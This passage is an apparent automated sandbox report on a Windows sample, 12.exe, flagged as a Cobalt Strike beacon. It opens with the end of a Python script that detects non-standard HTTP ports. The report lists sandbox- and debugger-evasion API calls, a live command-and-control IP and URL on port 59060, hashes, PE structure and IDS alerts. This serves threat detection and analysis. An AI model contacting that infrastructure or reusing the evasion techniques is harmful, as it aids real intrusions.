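Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 59060
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 59060
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 59060
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 59060
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 80
"""

if __name__ == "__main__":
    for alert in find_nonstandard_http(parse_flows(SAMPLE.splitlines())):
        print(alert)
```

Run over the full 84 lines of the report this yields a single alert for port 59060 with 84 connections and 84 distinct source ports; the port-80 line in the sample never alerts regardless of threshold because it is on the allow-list.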

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB3685 0_2_00DB3685
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB7E57 0_2_00DB7E57
Source: C:\Users\user\Desktop\12.exe | Window / User API: threadDelayed 1773
Source: C:\Users\user\Desktop\12.exe | Window / User API: threadDelayed 8104
Source: C:\Users\user\Desktop\12.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-40462
Source: C:\Users\user\Desktop\12.exe | Evasive API call chain: GetLocalTime,DecisionNodes graph_0-40142
Source: C:\Users\user\Desktop\12.exe | API coverage: 7.5 %
Source: C:\Users\user\Desktop\12.exe TID: 7328 | Thread sleep count: 1773 > 30
Source: C:\Users\user\Desktop\12.exe TID: 7328 | Thread sleep time: -17730000s >= -30000s
Source: C:\Users\user\Desktop\12.exe TID: 7340 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\12.exe TID: 7328 | Thread sleep count: 8104 > 30
Source: C:\Users\user\Desktop\12.exe TID: 7328 | Thread sleep time: -81040000s >= -30000s
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\12.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBA70E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose, 0_2_00DBA70E
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB5225 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose, 0_2_00DB5225
Source: C:\Users\user\Desktop\12.exe | Thread delayed: delay time: 60000
Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp; 12.exe, 00000000.00000002.4124793161.000000000074E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\12.exe | API call chain: ExitProcess graph end node graph_0-40316

Anti Debugging

Source: C:\Users\user\Desktop\12.exe | Process Stats: CPU usage > 42% for more than 60s
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DD9375 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,DebugBreak, 0_2_00DD9375
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB21D8 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00DB21D8
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBB870 mov eax, dword ptr fs:[00000030h] 0_2_00DBB870
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBABA0 mov eax, dword ptr fs:[00000030h] 0_2_00DBABA0
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00D7AC70 mov eax, dword ptr fs:[00000030h] 0_2_00D7AC70
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00D79FA0 mov eax, dword ptr fs:[00000030h] 0_2_00D79FA0
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB91C2 DeleteProcThreadAttributeList,GetProcessHeap,HeapFree, 0_2_00DB91C2
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_0040116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 0_2_0040116C
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00401A5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 0_2_00401A5C
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00401A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 0_2_00401A60
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00401160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 0_2_00401160
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_004013C1 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 0_2_004013C1
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_004011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 0_2_004011A3
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DD0331 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00DD0331
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DCC4B2 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00DCC4B2
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DD2950 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DD2950

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTR
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBE272 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError, 0_2_00DBE272
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBE442 GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00DBE442
Source: C:\Users\user\Desktop\12.exe | Code function: GetLocaleInfoA, 0_2_00DD5EF0
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_0040161C CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle, 0_2_0040161C
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_004019A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004019A0
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB7F09 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf, 0_2_00DB7F09
Source: C:\Users\user\Desktop\12.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTR
Source: Yara match | File source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 12.exe, type: SAMPLE
Source: Yara match | File source: 0.2.12.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.12.exe.400000.0.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB85B7 socket,htons,ioctlsocket,closesocket,bind,listen, 0_2_00DB85B7
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DB8699 htonl,htons,socket,closesocket,bind,ioctlsocket, 0_2_00DB8699
Source: C:\Users\user\Desktop\12.exe | Code function: 0_2_00DBEDB3 socket,closesocket,htons,bind,listen, 0_2_00DBEDB3
MITRE ATT&CK Matrix (leading numbers are the report's matched-signature counts, kept as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 2 Valid Accounts; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 2 Valid Accounts; 21 Access Token Manipulation; 1 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 2 Valid Accounts; 112 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 231 Security Software Discovery; 112 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Application Window Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 14 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 2 Encrypted Channel; 11 Non-Standard Port; 2 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 111 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Source | Detection | Scanner | Label
12.exe | 95% | ReversingLabs | Win32.Trojan.CobaltStrike
12.exe | 100% | Avira | HEUR/AGEN.1344233
12.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
http://152.42.226.16:59060/cxj-v) | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cxS-i) | 0% | Avira URL Cloud | safe
http://127.0.0.1:%u/ | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cx26.16:59060/cx | 0% | Avira URL Cloud | safe
152.42.226.16 | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cx | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cxA- | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cxwshqos.dll.muip | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cxwshqos.dll.mui | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cx1. | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cxmswsock.dll.muiW=L) | 0% | Avira URL Cloud | safe
http://152.42.226.16:59060/cxN- | 0% | Avira URL Cloud | safe
                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://152.42.226.16:59060/cx | true | Avira URL Cloud: safe | unknown
152.42.226.16 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://152.42.226.16:59060/cxwshqos.dll.muip | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://152.42.226.16:59060/cx26.16:59060/cx | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://152.42.226.16:59060/cxS-i) | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:%u/ | 12.exe, 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://152.42.226.16:59060/cx1. | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://152.42.226.16:59060/cxwshqos.dll.mui | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://152.42.226.16:59060/cxA- | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://152.42.226.16:59060/cxj-v) | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://152.42.226.16:59060/cxmswsock.dll.muiW=L) | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://152.42.226.16:59060/cxN- | 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
152.42.226.16 | unknown | United States | 81 | NCRENUS | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1581039
                    Start date and time:2024-12-26 19:27:05 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 15s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:12.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 35
                    • Number of non-executed functions: 160
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • VT rate limit hit for: 12.exe
Time | Type | Description
13:27:57 | API Interceptor | 11235564x Sleep call for process: 12.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
152.42.226.16 | 7W3KSFhWbw.elf | malicious | Unknown
152.42.226.16 | 3K6iey8Gan.elf | malicious | Unknown
152.42.226.16 | yA6XZfl1zU.elf | malicious | Unknown
                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NCRENUS | xd.sh4.elf | malicious | Mirai | 152.50.51.184
NCRENUS | xd.mpsl.elf | malicious | Mirai | 204.87.8.87
NCRENUS | telnet.ppc.elf | malicious | Unknown | 152.36.142.178
NCRENUS | loligang.arm7.elf | malicious | Mirai | 152.12.73.251
NCRENUS | nklmpsl.elf | malicious | Unknown | 152.28.215.100
NCRENUS | arm.nn.elf | malicious | Mirai, Okiru | 152.9.28.133
NCRENUS | arm5.nn.elf | malicious | Mirai, Okiru | 198.86.164.26
NCRENUS | spc.elf | malicious | Mirai, Moobot | 152.45.109.36
NCRENUS | star.ppc.elf | malicious | Mirai, Moobot | 152.10.107.176
NCRENUS | https://shibe-rium.net/ | malicious | Unknown | 152.42.156.84
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Entropy (8bit):6.737889780496197
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • VXD Driver (31/22) 0.00%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:12.exe
                          File size:324'096 bytes
                          MD5:c8c40c038a4a8541e0924520599d8c28
                          SHA1:295bb62eaf5f53f55d60f2f339a45cd7cd7aa82c
                          SHA256:cbc52ae56076b1e28cff760b662145425620ae4b6d400cc9446deec21d1aae4a
                          SHA512:76a4daccd65b67304942575cd47e8b63a658ba76d3be9a1a8977189538fb69bd22c9faa8b441fe1a5b355802afa0613c1c74b5e219360bfce5b447677e46e51c
                          SSDEEP:6144:niCnYE+pwcF84FHvr3JeYF+u5KyckoVuB31c1:iCnj+Y4FPUM+u57sG31c1
                          TLSH:E464CEB0D852E6E3C3885CB13D92FA57B7939B14013627EB892F948097F57A0CD4A74E
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................".....................0....@..........................@......l......... ............................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x4014a0
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                          DLL Characteristics:
                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                          TLS Callbacks:0x401b40, 0x401af0
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f6243a15fa8eee8ee96b5e1144d461f6
                          Instruction
                          sub esp, 0Ch
                          mov dword ptr [00450394h], 00000001h
                          call 00007F4AB506DA43h
                          add esp, 0Ch
                          jmp 00007F4AB506D1FBh
                          lea esi, dword ptr [esi+00000000h]
                          sub esp, 0Ch
                          mov dword ptr [00450394h], 00000000h
                          call 00007F4AB506DA23h
                          add esp, 0Ch
                          jmp 00007F4AB506D1DBh
                          lea esi, dword ptr [esi+00000000h]
                          sub esp, 1Ch
                          mov eax, dword ptr [esp+20h]
                          mov dword ptr [esp], eax
                          call 00007F4AB506E9CAh
                          test eax, eax
                          sete al
                          add esp, 1Ch
                          movzx eax, al
                          neg eax
                          ret
                          nop
                          nop
                          nop
                          push ebp
                          mov ebp, esp
                          sub esp, 18h
                          mov dword ptr [esp], 00401520h
                          call 00007F4AB506D523h
                          leave
                          ret
                          lea esi, dword ptr [esi+00000000h]
                          lea esi, dword ptr [esi+00h]
                          nop
                          ret
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          push ebp
                          mov ebp, esp
                          mov eax, dword ptr [ebp+08h]
                          pop ebp
                          jmp eax
                          push ebp
                          mov edx, dword ptr [0040302Ch]
                          mov ebp, esp
                          mov eax, dword ptr [ebp+08h]
                          test edx, edx
                          jle 00007F4AB506D573h
                          cmp dword ptr [00403030h], 00000000h
                          jle 00007F4AB506D56Ah
                          mov ecx, dword ptr [00451148h]
                          mov dword ptr [eax+edx], ecx
                          mov ecx, dword ptr [0045114Ch]
                          mov edx, dword ptr [00403030h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x51000 | 0x644 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4f030 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x5111c | 0xe0 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1a44 | 0x1c00 | 78084e5ca85835392a463f62abd5746c | False | 0.5334821428571429 | data | 5.700340700341032 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x4bc6c | 0x4be00 | 15647f750fd4bb141b4734a68d6d66f5 | False | 0.564453125 | dBase III DBT, version number 0, next free block index 10, 1st item "\206\270\324\021\242\273\324\021\242\273\324\021\242\273\324\021\242\273\324\021\242\273\324\021\242\273\324\021\214\317\261i\326\273\324\021w*\326\021\242\253\324\021\242)\326\021\242\277\324\021\242\273\324\021\242\273\324\021\242\273\324\021\202\273\324q\214\311\260p\326\332\324\021\203'\324\021\242\013\326\021\242%\324\021\242-\326\021\242\273\324\021\242\273\324\021\242\273\324\021\342\273\324Q\214\337\265e\303\273\324\021\342I\324\021\242\353\327\021\242\311\324" | 6.758593457994394 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x4f000 | 0x634 | 0x800 | 667441c840a2c3ea7e1291acd47bf4c5 | False | 0.2275390625 | data | 4.495993508967327 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0x50000 | 0x428 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x51000 | 0x644 | 0x800 | 7d72908e4c68f22d444c4e664d88dda3 | False | 0.3544921875 | data | 4.2935353496828945 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x52000 | 0x34 | 0x200 | a09a5f5fb4593e99cd0076e5f2fcec2e | False | 0.072265625 | Matlab v4 mat-file (little endian) \200\031@, numeric, rows 4198688, columns 0 | 0.2711142780062829 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x53000 | 0x8 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
KERNEL32.dll | CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
msvcrt.dll | __getmainargs, __initenv, __lconv_init, __p__acmdln, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _initterm, _iob, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T19:28:01.174082+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49730 | 152.42.226.16 | 59060 | TCP
2024-12-26T19:28:04.065607+0100 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49731 | 152.42.226.16 | 59060 | TCP
